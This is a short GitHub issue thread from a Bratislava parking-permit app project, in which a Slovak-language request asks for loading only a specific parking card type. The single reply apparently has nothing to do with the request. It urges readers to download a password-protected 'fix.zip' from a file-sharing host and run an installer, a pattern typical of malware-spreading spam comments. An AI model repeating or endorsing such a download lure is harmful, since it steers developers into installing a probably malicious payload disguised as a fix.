### ISSUE TITLE
Add possibility to load only specific parking card type

### ISSUE THREAD

**Issue by zuzanaslobodova** [bratislava/paas-mpa#628]
zadanie od OP na zmenu pridavania parkovacich kariet do aplikacie: https://inovaciebratislava.slack.com/archives/C05BZSH5J85/p1721654244734179

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
